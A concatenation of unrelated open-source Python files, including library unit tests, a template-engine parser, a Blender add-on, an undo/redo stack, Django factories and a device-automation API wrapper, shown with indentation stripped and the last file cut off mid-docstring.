# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pynguin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pynguin. If not, see <https://www.gnu.org/licenses/>.
import inspect
from typing import Union
import pytest
from pynguin.typeinference.strategy import InferredSignature
def _dummy(x: int, y: int) -> int:
return x * y
@pytest.fixture
def signature():
return inspect.signature(_dummy)
@pytest.fixture
def inferred_signature(signature):
return InferredSignature(
signature=signature, parameters={"x": int, "y": int}, return_type=int,
)
def test_update_parameter_type(inferred_signature):
inferred_signature.update_parameter_type("x", Union[int, float])
assert inferred_signature.parameters["x"] == Union[int, float]
assert inferred_signature.signature.parameters["x"] == inspect.Parameter(
name="x",
kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,
annotation=Union[int, float],
)
def test_update_return_type(inferred_signature):
inferred_signature.update_return_type(Union[int, float])
assert inferred_signature.return_type == Union[int, float]
assert inferred_signature.signature.return_annotation == Union[int, float]
def test_update_non_existing_parameter(inferred_signature):
with pytest.raises(AssertionError):
inferred_signature.update_parameter_type("b", bool)
|
########################################################################
##
## Copyright 2015 PMC-Sierra, Inc.
## Copyright 2018 Eidetic Communications Inc.
##
## Licensed under the Apache License, Version 2.0 (the "License"); you
## may not use this file except in compliance with the License. You may
## obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0 Unless required by
## applicable law or agreed to in writing, software distributed under the
## License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
## CONDITIONS OF ANY KIND, either express or implied. See the License for
## the specific language governing permissions and limitations under the
## License.
##
########################################################################
import sys
import time
import curses
class DummyContext(object):
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class Timeline(DummyContext):
def __init__(self, period=1.0, *args, **kwargs):
super().__init__(*args, **kwargs)
self.period = period
self.last_time = time.time() - period
self.duration = None
self.first = True
def wait_until_ready(self):
tm = self.last_time + self.period
if tm > time.time():
time.sleep(tm - time.time())
def next(self):
self.wait_until_ready()
if not self.first:
self.duration = time.time() - self.last_time
self.first = False
self.last_time = time.time()
class CursesContext(object):
def __enter__(self):
curses.setupterm()
self.cmd("smcup")
return self
def __exit__(self, type, value, traceback):
self.cmd("rmcup")
def cmd(self, name, *args):
s = curses.tigetstr(name)
sys.stdout.buffer.write(curses.tparm(s, *args))
def clear(self):
self.cmd("clear")
self.cmd("cup", 0, 0)
|
def pattern(n):
return "\n".join(" "*(n-1-i)+"".join([str(i%10) for i in range(1,n+1)])+" "*i for i in range(n))
|
"""FunCLI Package installer."""
from setuptools import find_packages, setup
setup(name='CLIFun',
version='0.0',
packages=find_packages(),
include_package_data=True,
install_requires=['Click',
'Fabric',
'laboratory', ],
entry_points={
'console_scripts': 'f=cli_fun.__main__:main'
}, )
|
from pytest import fixture, raises
from grblas import op, monoid, Scalar, Vector, Matrix
from grblas.exceptions import DimensionMismatch
@fixture
def v1():
return Vector.from_values([0, 2], [2.0, 5.0], name="v_1")
@fixture
def v2():
return Vector.from_values([1, 2], [3.0, 7.0], name="v_2")
@fixture
def A1():
return Matrix.from_values([0, 0], [0, 1], [0.0, 4.0], ncols=3, name="A_1")
@fixture
def A2():
return Matrix.from_values([0, 2], [0, 0], [6.0, 8.0], name="A_2")
@fixture
def s1():
return Scalar.from_value(3, name="s_1")
def test_ewise(v1, v2, A1, A2):
for left, right in [
(v1, v2),
(A1, A2.T),
(A1.T, A1.T),
(A1, A1),
]:
expected = left.ewise_mult(right, monoid.plus).new()
assert expected.isequal(monoid.plus(left & right).new())
assert expected.isequal(monoid.plus[float](left & right).new())
if isinstance(left, Vector):
assert (left & right).size == left.size
assert (left | right).size == left.size
else:
assert (left & right).nrows == left.nrows
assert (left | right).nrows == left.nrows
assert (left & right).ncols == left.ncols
assert (left | right).ncols == left.ncols
expected = left.ewise_add(right, op.plus).new()
assert expected.isequal(op.plus(left | right).new())
assert expected.isequal(op.plus[float](left | right).new())
expected = left.ewise_mult(right, op.minus).new()
assert expected.isequal(op.minus(left & right).new())
expected = left.ewise_add(right, op.minus, require_monoid=False).new()
assert expected.isequal(op.minus(left | right, require_monoid=False).new())
def test_matmul(v1, v2, A1, A2):
for method, left, right in [
("vxm", v2, A2),
("vxm", v2, A1.T),
("mxv", A1, v1),
("mxv", A2.T, v1),
("mxm", A1, A2),
("mxm", A1.T, A2.T),
("mxm", A1, A1.T),
("mxm", A2.T, A2),
]:
expected = getattr(left, method)(right, op.plus_times).new()
assert expected.isequal(op.plus_times(left @ right).new())
assert expected.isequal(op.plus_times[float](left @ right).new())
if isinstance(left, Vector):
assert (left @ right).size == right.ncols
assert op.plus_times(left @ right).size == right.ncols
elif isinstance(right, Vector):
assert (left @ right).size == left.nrows
assert op.plus_times(left @ right).size == left.nrows
else:
assert (left @ right).nrows == left.nrows
assert (left @ right).ncols == right.ncols
def test_bad_ewise(s1, v1, A1, A2):
for left, right in [
(v1, s1),
(s1, v1),
(v1, 1),
(1, v1),
(v1, A1),
(A1, v1),
(v1, A1.T),
(A1.T, v1),
(A1, s1),
(s1, A1),
(A1.T, s1),
(s1, A1.T),
(A1, 1),
(1, A1),
]:
with raises(TypeError, match="Bad type for argument"):
left | right
with raises(TypeError, match="Bad type for argument"):
left & right
w = v1[: v1.size - 1].new()
with raises(DimensionMismatch):
v1 | w
with raises(DimensionMismatch):
v1 & w
with raises(DimensionMismatch):
A2 | A1
with raises(DimensionMismatch):
A2 & A1
with raises(DimensionMismatch):
A1.T | A1
with raises(DimensionMismatch):
A1.T & A1
with raises(TypeError):
s1 | 1
with raises(TypeError):
1 | s1
with raises(TypeError):
s1 & 1
with raises(TypeError):
1 & s1
with raises(TypeError, match="Using __ior__"):
v1 |= v1
with raises(TypeError, match="Using __ior__"):
A1 |= A1
with raises(TypeError, match="Using __iand__"):
v1 &= v1
with raises(TypeError, match="Using __iand__"):
A1 &= A1
with raises(TypeError, match="require_monoid"):
op.minus(v1 | v1)
with raises(TypeError):
op.minus(v1 & v1, require_monoid=False)
with raises(TypeError, match="Bad types when calling binary.plus"):
op.plus(v1 & v1, 1)
def test_bad_matmul(s1, v1, A1, A2):
for left, right in [
(v1, s1),
(s1, v1),
(v1, 1),
(1, v1),
(A1, s1),
(s1, A1),
(A1.T, s1),
(s1, A1.T),
(A1, 1),
(1, A1),
]:
with raises(TypeError, match="Bad type for argument"):
left @ right
with raises(DimensionMismatch):
v1 @ A1
with raises(DimensionMismatch):
A1.T @ v1
with raises(DimensionMismatch):
A2 @ v1
with raises(DimensionMismatch):
v1 @ A2.T
with raises(DimensionMismatch):
A1 @ A1
with raises(DimensionMismatch):
A1.T @ A1.T
with raises(TypeError, match="__imatmul__"):
A1 @= A1
with raises(TypeError):
s1 @ 1
with raises(TypeError):
1 @ s1
with raises(TypeError, match="Bad type when calling semiring.plus_times"):
op.plus_times(A1)
with raises(TypeError, match="Bad types when calling semiring.plus_times."):
op.plus_times(A1, A2)
with raises(TypeError, match="Bad types when calling semiring.plus_times."):
op.plus_times(A1 @ A2, 1)
def test_apply_unary(v1, A1):
expected = v1.apply(op.exp).new()
assert expected.isequal(op.exp(v1).new())
assert expected.isequal(op.exp[float](v1).new())
expected = A1.apply(op.exp).new()
assert expected.isequal(op.exp(A1).new())
def test_apply_unary_bad(s1, v1):
with raises(TypeError, match="__call__"):
op.exp(v1, 1)
with raises(TypeError, match="__call__"):
op.exp(1, v1)
with raises(TypeError, match="Bad type when calling unary.exp"):
op.exp(s1)
with raises(TypeError, match="Bad type when calling unary.exp"):
op.exp(1)
with raises(TypeError, match="Bad type when calling unary.exp"):
op.exp(v1 | v1)
def test_apply_binary(v1, A1):
expected = v1.apply(monoid.plus, right=2).new()
assert expected.isequal(monoid.plus(v1, 2).new())
assert expected.isequal(monoid.plus[float](v1, 2).new())
expected = v1.apply(op.minus, right=2).new()
assert expected.isequal(op.minus(v1, 2).new())
assert expected.isequal(op.minus[float](v1, 2).new())
expected = v1.apply(op.minus, left=2).new()
assert expected.isequal(op.minus(2, v1).new())
expected = A1.apply(op.minus, right=2).new()
assert expected.isequal(op.minus(A1, 2).new())
expected = A1.apply(op.minus, left=2).new()
assert expected.isequal(op.minus(2, A1).new())
def test_apply_binary_bad(s1, v1):
with raises(TypeError, match="Bad types when calling binary.plus"):
op.plus(1, 1)
with raises(TypeError, match="Bad type when calling binary.plus"):
op.plus(v1)
with raises(TypeError, match="Bad type for keyword argument `right="):
op.plus(v1, v1)
with raises(TypeError, match="may only be used when performing an ewise_add"):
op.plus(v1, 1, require_monoid=False)
|
# クラスCoeffVarを定義
class CoeffVar(object):
coefficient = 1
@classmethod # メソッドmulをクラスメソッド化
def mul(cls, fact): # 第1引数はcls
return cls.coefficient * fact
# クラスCoeffvarを継承するクラスMulFiveを定義
class MulFive(CoeffVar):
coefficient = 5
x = MulFive.mul(4) # CoeffVar.mul(MulFive, 4) -> 20
|
import sys
sys.path.append("../Structures/")
import graph
from dfs import Dfs
from collections import deque
class Scc:
def execute(self, G):
dfs = Dfs()
dfs.executeNormal(G)
G.buildTranspGraph()
dfs.executeTransp(G)
self.printScc(G, dfs.getSccList())
def printScc(self, G, sccList):
for v in sccList:
if v.getPi() == None:
print v.getName()
else:
print v.getName(),
|
import re
from collections import namedtuple
from .exceptions import ParseError, ExpressionNotClosed
from .exceptions import NotClosedError, StatementNotFound
from .exceptions import StatementNotAllowed, UnexpectedClosingFound
from .registry import Registry
class Node:
def __init__(self, parent=None):
self.code = ""
self.parent = parent
def render(self, context):
return self.code
def __str__(self):
return "Plain node ----\n{}\n----\n".format(self.code)
class TextNode(Node):
def __init__(self, text, parent=None):
super().__init__(parent=parent)
self.text = text
def render(self, context):
return self.text
def __str__(self):
return "Text node ----\n{}\n----\n".format(self.text)
class ExpressionNode(Node):
def __init__(self, expression, parent=None):
super().__init__(parent=parent)
self.expression = expression
def render(self, context):
return str(context.eval(self.expression))
def __str__(self):
return "Statement node ----\n{}\n----\n".format(self.expression)
class StatementNode(Node):
open = ''
def __init__(self, type, expression="", parent=None):
super().__init__(parent=parent)
self.type = type
self.expression = expression
def compile(self, code, index=0):
return index
class CommentNode(StatementNode):
def __init__(self, expression="", parent=None):
super().__init__("comment", expression=expression, parent=parent)
class BlockStatementNode(StatementNode):
closing = None
has_block = True
def __init__(self, type, expression="", nodes=None, parent=None):
super().__init__(type, expression, parent=parent)
self.nodes = nodes or []
def render(self, context):
# The blockstatement itself will probably render to nothing
# so just include the childnodes
res = []
for node in self.nodes:
res.append(node.render(context))
return res
def __str__(self):
return "BlockStatement node {}----\n{}\n----\n".format(
self.type, self.code)
def __iter__(self):
return self.nodes
def find_start_block(self, code):
""" find the start of the nearest block: {{ {% or {# """
indexes = []
for start in ('{%', '{{', '{#'):
index = code.find(start)
if index != -1:
indexes.append(index)
if indexes:
return min(indexes)
return -1
def compile(self, pc, index=0):
res = []
code = pc.code
closing = self.closing
closing_found = closing is None
while index < len(code):
first_marker = self.find_start_block(code[index:])
if first_marker == -1:
res.append(TextNode(code[index:]))
index = len(code)
break
if first_marker > 0:
# Is there any text to put in a node?
res.append(TextNode(code[index:index + first_marker]))
index += first_marker
if closing and re.match("{{%\s*{}\s*%}}".format(closing),
code[index:]):
closing_found = True
index += code[index:].find("%}") + 2
break
node, skip = CompileStatement(pc[index:], parent=self)
res.append(node)
index += skip
if not closing_found:
raise ParseError("Closing tag {} not found".format(closing),
pc)
self.nodes = res
self.code = code[:index]
return index
class MainNode(BlockStatementNode):
pass
class FillBlockStatementNode(BlockStatementNode):
open = 'fill'
closing = 'endfill'
class ForBlockStatementNode(BlockStatementNode):
open = 'for'
closing = 'endfor'
def looper(self, sequence):
looptype = namedtuple("Loop", ["index", "index0", "first", "last"])
l = len(sequence)
for i, v in enumerate(sequence):
yield looptype(i, i + 1, i == 0, i == l - 1), v
def render(self, context):
var, _in, expr = self.expression.partition(" in ")
var = var.strip()
seq = context.eval(expr.strip())
res = []
for loop, element in self.looper(seq):
context.push({var: element, 'loop': loop})
for node in self.nodes:
res.append(node.render(context))
context.pop()
return res
class IfBlockStatementNode(BlockStatementNode):
open = 'if'
closing = 'endif'
def render(self, context):
res = []
t, f = [], []
current = t
for node in self.nodes:
if isinstance(node, ElseInIfStatementNode):
current = f
else:
current.append(node)
if context.eval(self.expression):
for node in t:
res.append(node.render(context))
else:
for node in f:
res.append(node.render(context))
return res
class ElseInIfStatementNode(StatementNode):
""" Should only be allowed inside if blockstatement """
open = 'else'
class SlotStatementNode(BlockStatementNode):
open = 'slot'
closing = 'endslot'
def render(self, context):
res = []
blockname = self.expression or "main"
block_found = False
# is there a child to pop? E.g. rendering base template directly
if context.child():
with context.popchild() as tpl:
for node in tpl.mainnode.nodes:
if isinstance(node, FillBlockStatementNode):
block_found = True
if node.expression == blockname:
res.append(node.render(context))
break
else:
if not block_found:
# use entire template as matching block
block_found = True
res.append(tpl.render_with_context(
context,
start_at_parent=False))
else:
# render the body of the block
for node in self.nodes:
res.append(node.render(context))
else:
# render the body of the block
for node in self.nodes:
res.append(node.render(context))
return res
registry = Registry()
registry.register('for', ForBlockStatementNode, MainNode)
registry.register('if', IfBlockStatementNode, MainNode)
registry.register('else', ElseInIfStatementNode,
IfBlockStatementNode, direct=True)
# registry.register('else', ForBlockStatementNode, direct=True)
registry.register('slot', SlotStatementNode, MainNode)
registry.register('fill', FillBlockStatementNode, MainNode)
def parse_expression(code, start="{{", end="}}"):
""" parse any expression surrounded by start/end,
supporting string expressions containing start/end
markers. Code may contain trailing code
return index where parsing ends including parsing of endmarker
"""
assert code[:2] == start
escape_mode = False
string_mode = '' # can be ' " or empty
res = ''
for index in range(2, len(code)):
c = code[index]
if string_mode:
if not escape_mode:
if c == string_mode:
string_mode = False
if c == '\\':
escape_mode = True
else:
escape_mode = False
elif c in "'\"":
string_mode = c
elif code[index:index + 2] == end:
# 'end' ends the expression and we're not inside a string
index += 1 # we read one } ahead (assume end is 2 characters)
break
res += c
else:
raise ExpressionNotClosed()
return res, index + 1
def parse_statement(code):
""" parse
{% stmnt expr %}
where "expr" may contain a string containing '%}'
"""
r = parse_expression(code, start='{%', end='%}')
return r
def parse_comment(code):
r = parse_expression(code, start='{#', end='#}')
return r
def CompileStatement(pc, parent=None):
""" Either a block statement {% or expression statement {{
has started. Figure out what it is and parse it
"""
parent = parent or MainNode("main")
# we have a parse context. catch errors and add line numbers etc?
if pc.code[1] == '{': # expression statement
try:
expr, end = parse_expression(pc.code)
except ExpressionNotClosed as e:
raise ParseError("Expression not closed", pc) from e
return ExpressionNode(expr), end
if pc.code[1] == '#': # comment
try:
expr, end = parse_comment(pc.code)
except ExpressionNotClosed as e:
raise ParseError("Comment not closed", pc) from e
return CommentNode(expr), end
try:
statement, end = parse_statement(pc.code)
except ExpressionNotClosed as e:
raise ParseError("Statement not closed", pc) from e
statement = statement.strip()
main, _, expr = statement.partition(" ")
pc.tag = main
try:
klass = registry.find(main, parent)
except NotClosedError as e:
raise ParseError("Statement not closed", pc) from e
except StatementNotFound as e:
raise ParseError("Statement not found", pc) from e
except StatementNotAllowed as e:
raise ParseError("Statement not allowed", pc) from e
except UnexpectedClosingFound as e:
raise ParseError("Unexpected closing statement found", pc) from e
node = klass(main, expr, parent=parent)
pc.node = node
end = node.compile(pc, end)
# No node is inserted, it purely returns body
return node, end
|
import bpy
from bpy.props import *
from .PesFacemod.PesFacemod import *
import bpy.utils.previews
bl_info = {
"name": "PES2020 Facemod",
"version": (1, 80, 0),
"blender": (2, 80, 0),
"location": "Under Scene Tab",
"description": "Unpacks and packs face.fpk files for modification",
"warning": "Saving your .blend file won't work, you must pack everything and start again. Backup your files.",
"wiki_url": "",
"tracker_url": "",
"category": "System"
}
classes = (
ListItem,
PANEL_PT_file_properties,
FMDL_UL_strings,
PANEL_PT_string_properties,
OBJECT_OT_face_hair_modifier
)
def register():
for cls in classes:
bpy.utils.register_class(cls)
pcoll = bpy.utils.previews.new()
my_icons_dir = os.path.join(os.path.dirname(__file__))
# load a preview thumbnail of a file and store in the previews collection
print("Loading ", os.path.join(my_icons_dir, "icon.png"))
pcoll.load("fhm_icon", os.path.join(my_icons_dir, "icon.png"), 'IMAGE')
preview_collections["main"] = pcoll
bpy.types.Object.fmdl_strings = CollectionProperty(type=ListItem)
bpy.types.Object.list_index = IntProperty(name="Index for fmdl_strings", default=0)
def unregister():
for cls in reversed(classes):
bpy.utils.unregister_class(cls)
for pcoll in preview_collections.values():
bpy.utils.previews.remove(pcoll)
preview_collections.clear()
if __name__ == "__main__":
register()
|
import time
class EditCommand:
"undo/redo-able representation of an art edit (eg paint, erase) operation"
def __init__(self, art):
self.art = art
self.start_time = art.app.get_elapsed_time()
self.finish_time = None
# nested dictionary with frame(layer(column(row))) structure -
# this prevents multiple commands operating on the same tile
# from stomping each other
self.tile_commands = {}
def get_number_of_commands(self):
commands = 0
for frame in self.tile_commands.values():
for layer in frame.values():
for column in layer.values():
for tile in column.values():
commands += 1
return commands
def __str__(self):
# get unique-ish ID from memory address
addr = self.__repr__()
addr = addr[addr.find('0'):-1]
s = 'EditCommand_%s: %s tiles, time %s' % (addr, self.get_number_of_commands(),
self.finish_time)
return s
def add_command_tiles(self, new_command_tiles):
for ct in new_command_tiles:
# create new tables for frames/layers/columns if not present
if not ct.frame in self.tile_commands:
self.tile_commands[ct.frame] = {}
if not ct.layer in self.tile_commands[ct.frame]:
self.tile_commands[ct.frame][ct.layer] = {}
if not ct.y in self.tile_commands[ct.frame][ct.layer]:
self.tile_commands[ct.frame][ct.layer][ct.y] = {}
# preserve "before" state of any command we overwrite
if ct.x in self.tile_commands[ct.frame][ct.layer][ct.y]:
old_ct = self.tile_commands[ct.frame][ct.layer][ct.y][ct.x]
ct.set_before(old_ct.b_char, old_ct.b_fg, old_ct.b_bg,
old_ct.b_xform)
self.tile_commands[ct.frame][ct.layer][ct.y][ct.x] = ct
def undo_commands_for_tile(self, frame, layer, x, y):
# tile might not have undo commands, eg text entry beyond start region
if not y in self.tile_commands[frame][layer] or \
not x in self.tile_commands[frame][layer][y]:
return
self.tile_commands[frame][layer][y][x].undo()
def undo(self):
for frame in self.tile_commands.values():
for layer in frame.values():
for column in layer.values():
for tile_command in column.values():
tile_command.undo()
def apply(self):
for frame in self.tile_commands.values():
for layer in frame.values():
for column in layer.values():
for tile_command in column.values():
tile_command.apply()
class EntireArtCommand:
"""
undo/redo-able representation of a whole-art operation, eg:
resize/crop, run art script, add/remove layer, etc
"""
# art arrays to grab
array_types = ['chars', 'fg_colors', 'bg_colors', 'uv_mods']
def __init__(self, art, origin_x=0, origin_y=0):
self.art = art
# remember origin of resize command
self.origin_x, self.origin_y = origin_x, origin_y
self.before_frame = art.active_frame
self.before_layer = art.active_layer
self.start_time = self.finish_time = art.app.get_elapsed_time()
def save_tiles(self, before=True):
# save copies of tile data lists
prefix = 'b' if before else 'a'
for atype in self.array_types:
# save list as eg "b_chars" for "character data before operation"
src_data = getattr(self.art, atype)
var_name = '%s_%s' % (prefix, atype)
# deep copy each frame's data, else before == after
new_data = []
for frame in src_data:
new_data.append(frame.copy())
setattr(self, var_name, new_data)
if before:
self.before_size = (self.art.width, self.art.height)
else:
self.after_size = (self.art.width, self.art.height)
def undo(self):
# undo might remove frames/layers that were added
self.art.set_active_frame(self.before_frame)
self.art.set_active_layer(self.before_layer)
if self.before_size != self.after_size:
x, y = self.before_size
self.art.resize(x, y, self.origin_x, self.origin_y)
for atype in self.array_types:
new_data = getattr(self, 'b_' + atype)
setattr(self.art, atype, new_data[:])
if self.before_size != self.after_size:
# Art.resize will set geo_changed and mark all frames changed
self.art.app.ui.adjust_for_art_resize(self.art)
self.art.mark_all_frames_changed()
def apply(self):
if self.before_size != self.after_size:
x, y = self.after_size
self.art.resize(x, y, self.origin_x, self.origin_y)
for atype in self.array_types:
new_data = getattr(self, 'a_' + atype)
setattr(self.art, atype, new_data[:])
if self.before_size != self.after_size:
self.art.app.ui.adjust_for_art_resize(self.art)
self.art.mark_all_frames_changed()
class EditCommandTile:
def __init__(self, art):
self.art = art
self.creation_time = self.art.app.get_elapsed_time()
# initialize everything
# previously did 'string list of serialized items' + setattr
# which made prettier code but was slower
self.frame = self.layer = self.x = self.y = None
self.b_char = self.b_fg = self.b_bg = self.b_xform = None
self.a_char = self.a_fg = self.a_bg = self.a_xform = None
def __str__(self):
s = 'F%s L%s %s,%s @ %.2f: ' % (self.frame, self.layer, str(self.x).rjust(2, '0'), str(self.y).rjust(2, '0'), self.creation_time)
s += 'c%s f%s b%s x%s -> ' % (self.b_char, self.b_fg, self.b_bg, self.b_xform)
s += 'c%s f%s b%s x%s' % (self.a_char, self.a_fg, self.a_bg, self.a_xform)
return s
def __eq__(self, value):
return self.frame == value.frame and self.layer == value.layer and \
self.x == value.x and self.y == value.y and \
self.b_char == value.b_char and self.b_fg == value.b_fg and \
self.b_bg == value.b_bg and self.b_xform == value.b_xform and \
self.a_char == value.a_char and self.a_fg == value.a_fg and \
self.a_bg == value.a_bg and self.a_xform == value.a_xform
def copy(self):
"returns a deep copy of this tile command"
new_ect = EditCommandTile(self.art)
# TODO: old or new timestamp? does it matter?
#new_ect.creation_time = self.art.app.get_elapsed_time()
new_ect.creation_time = self.creation_time
# copy all properties
new_ect.frame, new_ect.layer = self.frame, self.layer
new_ect.x, new_ect.y = self.x, self.y
new_ect.b_char, new_ect.b_xform = self.b_char, self.b_xform
new_ect.b_fg, new_ect.b_bg = self.b_fg, self.b_bg
new_ect.a_char, new_ect.a_xform = self.a_char, self.a_xform
new_ect.a_fg, new_ect.a_bg = self.a_fg, self.a_bg
return new_ect
def set_tile(self, frame, layer, x, y):
self.frame, self.layer = frame, layer
self.x, self.y = x, y
def set_before(self, char, fg, bg, xform):
self.b_char, self.b_xform = char, xform
self.b_fg, self.b_bg = fg, bg
def set_after(self, char, fg, bg, xform):
self.a_char, self.a_xform = char, xform
self.a_fg, self.a_bg = fg, bg
def is_null(self):
return self.a_char == self.b_char and self.a_fg == self.b_fg and self.a_bg == self.b_bg and self.a_xform == self.b_xform
def undo(self):
# tile's frame or layer may have been deleted
if self.layer > self.art.layers - 1 or self.frame > self.art.frames - 1:
return
if self.x >= self.art.width or self.y >= self.art.height:
return
tool = self.art.app.ui.selected_tool
set_all = tool.affects_char and tool.affects_fg_color and tool.affects_fg_color and tool.affects_xform
self.art.set_tile_at(self.frame, self.layer, self.x, self.y,
self.b_char, self.b_fg, self.b_bg, self.b_xform, set_all)
def apply(self):
tool = self.art.app.ui.selected_tool
set_all = tool.affects_char and tool.affects_fg_color and tool.affects_fg_color and tool.affects_xform
self.art.set_tile_at(self.frame, self.layer, self.x, self.y,
self.a_char, self.a_fg, self.a_bg, self.a_xform, set_all)
class CommandStack:
def __init__(self, art):
self.art = art
self.undo_commands, self.redo_commands = [], []
def __str__(self):
s = 'stack for %s:\n' % self.art.filename
s += '===\nundo:\n'
for cmd in self.undo_commands:
s += str(cmd) + '\n'
s += '\n===\nredo:\n'
for cmd in self.redo_commands:
s += str(cmd) + '\n'
return s
def commit_commands(self, new_commands):
self.undo_commands += new_commands[:]
self.clear_redo()
def undo(self):
if len(self.undo_commands) == 0:
return
command = self.undo_commands.pop()
self.art.app.cursor.undo_preview_edits()
command.undo()
self.redo_commands.append(command)
self.art.app.cursor.update_cursor_preview()
def redo(self):
if len(self.redo_commands) == 0:
return
command = self.redo_commands.pop()
# un-apply cursor preview before applying redo, else preview edits
# edits will "stick"
self.art.app.cursor.undo_preview_edits()
command.apply()
# add to end of undo stack
self.undo_commands.append(command)
self.art.app.cursor.update_cursor_preview()
def clear_redo(self):
self.redo_commands = []
|
# Some python class related homework
import math
class Point:
"""Two values"""
def __init__(self, *args):
if len(args) == 2:
if all(a for a in args if type(a) == float):
self.x = args[0]
self.y = args[1]
elif len(args) == 1:
if type(args[0]) == Point:
self.x = args[0].x
self.y = args[0].y
else:
self.x = 0.0
self.y = 0.0
class Line:
"""Two points"""
def __init__(self, a, b):
self.a = a
self.b = b
def distance(self):
return (((self.b.x - self.a.x) ** 2.0) + ((self.b.y - self.a.y) ** 2.0)) ** 0.5
a = Point()
b = Point(0.0, 1.0)
c = Point(b)
l = Line(a, c)
print(l.distance())
|
"""
Unittests for fxos/ftd plugin
Uses the unicon.mock.mock_device script to test the plugin.
"""
__author__ = "dwapstra"
import unittest
from unicon import Connection
from unicon.eal.dialogs import Dialog
from unicon.plugins.generic.statements import GenericStatements
generic_statements = GenericStatements()
password_stmt = generic_statements.password_stmt
escape_char_stmt = generic_statements.escape_char_stmt
class TestFxosFtdPlugin(unittest.TestCase):
def test_connect(self):
c = Connection(hostname='Firepower',
start=['mock_device_cli --os fxos --state fxos_connect'],
os='fxos',
series='ftd',
credentials=dict(default=dict(username='cisco', password='cisco')))
c.connect()
self.assertEqual(c.spawn.match.match_output, '\r\nFirepower# ')
return c
def test_execute_scope(self):
c = self.test_connect()
c.switchto('chassis scope /system/services')
r = c.execute(['create ntp-server 192.168.200.101', 'commit-buffer'])
self.assertEqual(r, {'commit-buffer': '', 'create ntp-server 192.168.200.101': ''})
self.assertEqual(c.spawn.match.match_output, 'commit-buffer\r\nFirepower /system/services # ')
def test_execute_scope2(self):
c = self.test_connect()
c.execute(['scope service-profile'], allow_state_change=True)
def test_are_you_sure_stmt(self):
c = self.test_connect()
c.execute(['scope security', 'clear-user-sessions all'], allow_state_change=True)
def test_console_execute(self):
c = Connection(hostname='Firepower',
start=['mock_device_cli --os fxos --state chassis_exec'],
os='fxos',
series='ftd',
credentials=dict(
default=dict(username='cisco', password='cisco', line_password='cisco'),
sudo=dict(password='cisco')))
c.connect()
c.spawn.timeout = 30
c.switchto('ftd expert', timeout=60)
c.execute(['sudo su -'],
reply=Dialog([password_stmt, escape_char_stmt]),
allow_state_change=True)
def test_switchto_states(self):
states = [
'chassis',
'chassis scope /system',
'fxos',
'local-mgmt',
'cimc',
'cimc 1',
'module console',
'module 1 console',
'ftd console',
'ftd expert',
'ftd expert root'
]
c = Connection(hostname='Firepower',
start=['mock_device_cli --os fxos --state fxos_exec'],
os='fxos',
series='ftd',
credentials=dict(
default=dict(username='cisco', password='cisco', line_password='cisco'),
sudo=dict(password='cisco')))
c.connect()
for state in states:
c.switchto(state)
if __name__ == "__main__":
unittest.main()
|
from factory import Sequence, SubFactory
from factory.django import DjangoModelFactory
from documentation.models import Map, Block, IDE, Category
class MapFactory(DjangoModelFactory):
class Meta:
model = Map
title = Sequence(lambda n: "Concept %03d" % n)
slug = Sequence(lambda n: "/concepts/%03d" % n)
class BlockFactory(DjangoModelFactory):
class Meta:
model = Block
title = Sequence(lambda n: "Block %03d" % n)
slug = Sequence(lambda n: "%03d" % n)
parent_ide = SubFactory('documentation.factories.IDEFactory')
parent = parent_ide
class IDEFactory(DjangoModelFactory):
class Meta:
model = IDE
title = Sequence(lambda n: "IDE %03d" % n)
slug = Sequence(lambda n: "%03d" % n)
class CategoryFactory(DjangoModelFactory):
class Meta:
model = Category
name = Sequence(lambda n: "Category %03d" % n)
parent_ide = SubFactory('documentation.factories.IDEFactory')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, generators, division, absolute_import, with_statement, print_function
from .__init__ import APIBase, log
from urllib import urlencode
class Scheduler(APIBase):
"""Scheduling operations
Extends:
APIBase
"""
def __init__(self, securityToken, baseURL='https://mobilecloud.perfectomobile.com/services/'):
"""construct class
Arguments:
securityToken {string} -- security token generated through the perfecto console
Keyword Arguments:
baseURL {str} -- Base url for the web services. (default: {'https://mobilecloud.perfectomobile.com/services/'})
"""
self.initClient(securityToken, baseURL)
def createSchedule(self, scheduleKey, recurrence, scriptKey,
status=None, owner=None, startTime=None,
endTime=None, repeatCount=None, description=None,
responseFormat="json", admin=False, *parameters, **securedParams):
"""Creates a new scheduled execution. It is possible to request a status message via email or SMS indicating whether the script ran successfully.
Users can create up to 20 scheduled executions.
Every scheduled execution name must be unique. You cannot use the same scheduled execution name more than once
Arguments:
scheduleKey {string} -- Format is: visibility:<scheduled execution_name>
visibility values: PUBLIC, PRIVATE, GROUP.
The default visibility is PRIVATE.
PRIVATE – the scheduled execution can be viewed by the owner only.
GROUP – the scheduled execution can be viewed by everyone in the owner's group.
PUBLIC – the scheduled execution can be viewed by every user.
execution_name is supplied by the user.
The scheduled execution can be updated by its owner and by automation
administrators.
recurrence {string} -- Cron expression.
The Cron expression maker can be used for creating Cron expressions.
Cron expression limitations
It is not possible for run a script every second.
In the second and minute expressions " *" is not allowed.
Note: The Cron expression is reset every round hour/day.
For example, if a schedule is executed every 20 minutes, starting 10
minutes after the top of the hour, in first hour the script
will run at x:30, x:50, and in the next hour it will run
at x:30, x:50 again.
scriptKey {string} -- Format is: visibility:<scheduled execution_name>
visibility values: PUBLIC, PRIVATE, GROUP.
The default visibility is PRIVATE.
PRIVATE – the scheduled execution can be viewed by the owner only.
GROUP – the scheduled execution can be viewed by everyone in the owner's group.
PUBLIC – the scheduled execution can be viewed by every user.
execution_name is supplied by the user.
The scheduled execution can be updated by its owner and by automation
administrators.
*params {List[Tuple[string, string]]} -- [description]
**securedParams {dict[string, string]} -- [description]
Keyword Arguments:
status {string} -- Available values: ACTIVE, INACTIVE (default: {None})
owner {string} -- The user name of the user who owns the scheduled execution.
This parameter is used in conjunction with the admin parameter to allow
administrators to perform operations on scheduled executions of other users.
If a user with administrative credentials wants to create a scheduled
executions of user "User", specify the parameters as
admin=true and owner=User. (default: {None})
startTime {long} -- When the scheduled execution will start. In UTC milliseconds. (default: {None})
